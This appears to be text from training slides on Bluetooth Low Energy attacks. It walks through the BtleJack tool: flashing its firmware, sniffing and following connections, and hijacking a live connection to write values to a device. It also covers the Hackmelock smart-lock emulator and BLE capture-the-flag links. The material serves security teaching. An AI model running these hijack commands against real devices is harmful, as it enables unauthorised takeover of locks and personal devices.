[Link]
[Link]
 BtleJack, Defcon 26

[Link]
[Link]
 Hijacking Lovense sex toy

[Link]
Cauquil-Secure-Your-BLE-Devices-Demo-Videos/demo-hush.mp4
BTLEJACK
BtleJack

Presented at Defcon 26 by Damien Cauquil (@virtualabs)

Slides:
[Link]
mien%20Cauquil%20-%20Updated/DEFCON-26-Damien-Cauquil-Secure-Your-BLE-
[Link]

Source:
[Link]
BtleJack

Designed to work on BBC micro:bit.

It is $15 educational device, easy to
develop (micropython) and flash
(send file to USB storage).
Built upon nRF51822 –> we can use
BtleJack fw on other nRF51822 hw.
[Link]
BtleJack on other nRF51822

BLE400 has already built-in USB adapter

The pinout is different than BBC micro:bit

-> a small patch to the firmware:

[Link](P0_9, P0_11);
Flash Btlejack to our board using openocd

> halt
> nrf51 mass_erase
> reset
> halt
> flash write_image nrf/[Link]
(...)
> reset
For the new Btlejack version

Btlejack requires client and firmware versions matching.

After updating the client, firmware should also be updated.
Current BLE400 hex precompiled by Damien on Github:
[Link]
firmware/blob/master/dist/[Link]
Install BtleJack client (already in your VM)

Kali Linux:
# pip3 install btlejack
Btlejack – catch and follow connection requests

root@kali:~# btlejack -c any -d /dev/ttyUSB0

BtleJack version 1.1

[i] Detected sniffers:

Works basically like an
> Sniffer #0: version 1.2 nRF sniffer
Btlejack – catch any connreq (adv channels)
Filter specific device MAC

root@kali:~# btlejack -c [Link] -d /dev/ttyUSB0

BtleJack version 1.2

[i] Detected sniffers:

> Sniffer #0: version 1.2
Save output to pcap (Wireshark)

root@kali:~# btlejack -c any -d /dev/ttyUSB0 –x nordic –o [Link]

pcap format (nordic, ll_phdr, pcap)

Multiple Btlejack devices

root@kali:~# btlejack -c [Link] -d /dev/ttyUSB0

-d /dev/ttyUSB1 –d /dev/ttyUSB2

Devices will work in parallel, better

chances to catch packets
Catch existing connections

root@kali:~# btlejack -s -d /dev/ttyUSB0

BtleJack version 1.1

[i] Enumerating existing connections ...

[ - 55 dBm] 0x1816aa34 | pkts: 1
[ - 55 dBm] 0x1816aa34 | pkts: 2
[ - 55 dBm] 0x1816aa34 | pkts: 3

After connection is established, it is determined

in RF by „access address” (connection id)
Follow specific connection

btlejack –f <access address>

Example data captured (LED on)
Read value of 0x27

Value 00

Write 01 to 0x27

Read again value of 0x27

Value 01
Hijack the connection

root@kali:~# btlejack -f 0x9edbd4ca -t -d /dev/ttyUSB0

(...)
[i] Synchronized, hijacking in progress ...
[i] Connection successfully hijacked, it is all yours \o/
btlejack> write <value handle> <data format> <data>
write 0x25 hex 01

Turn on the LED

SEE ALSO
Hackmelock
Open-source

[Link]

Sources:
[Link]

[Link]
Requirements – emulator script

Hackmelock is written using [Link] bleno library (and additional libs: colors,
async). It is already installed on your Raspberry.

Installing on other systems: npm install hackmelock.

It was tested on Linux (Kali, Raspberry Pi, ...), should run also on Mac,
probably Windows.

Bleno installation and requirements:

[Link]
Install (already in your Kali)

Emulated device:
$ npm install hackmelock

Android app:
[Link]
Run emulator

$ cd node_modules/hackmelock/
$ node peripheral

advertising...
In configuration mode, it advertises iBeacon

Major/Minor=1
Pairing
After pairing emulator stores [Link]

$ node [Link]
advertising...
Client [Link] connected!
Status read request:
Initialization mode!
initializing... 0 531ce397
initializing... 1 325d18fe1481151073dc4d4a
initializing... 2 7ca71db0196bda712131dc57
(...)
Config loaded - iBeaconMajor: 21276 iBeaconMinor: 58263
Sharing access
See also

Hacking bluetooth smart locks (my Brucon workshop slides):

[Link]
Smart_locks.pdf
BLE CTF (esp32)
[Link]
[Link]
BLEMystique (esp32)
[Link]
 Want to learn more?

Trainings
Tutorials
Events
...

[Link]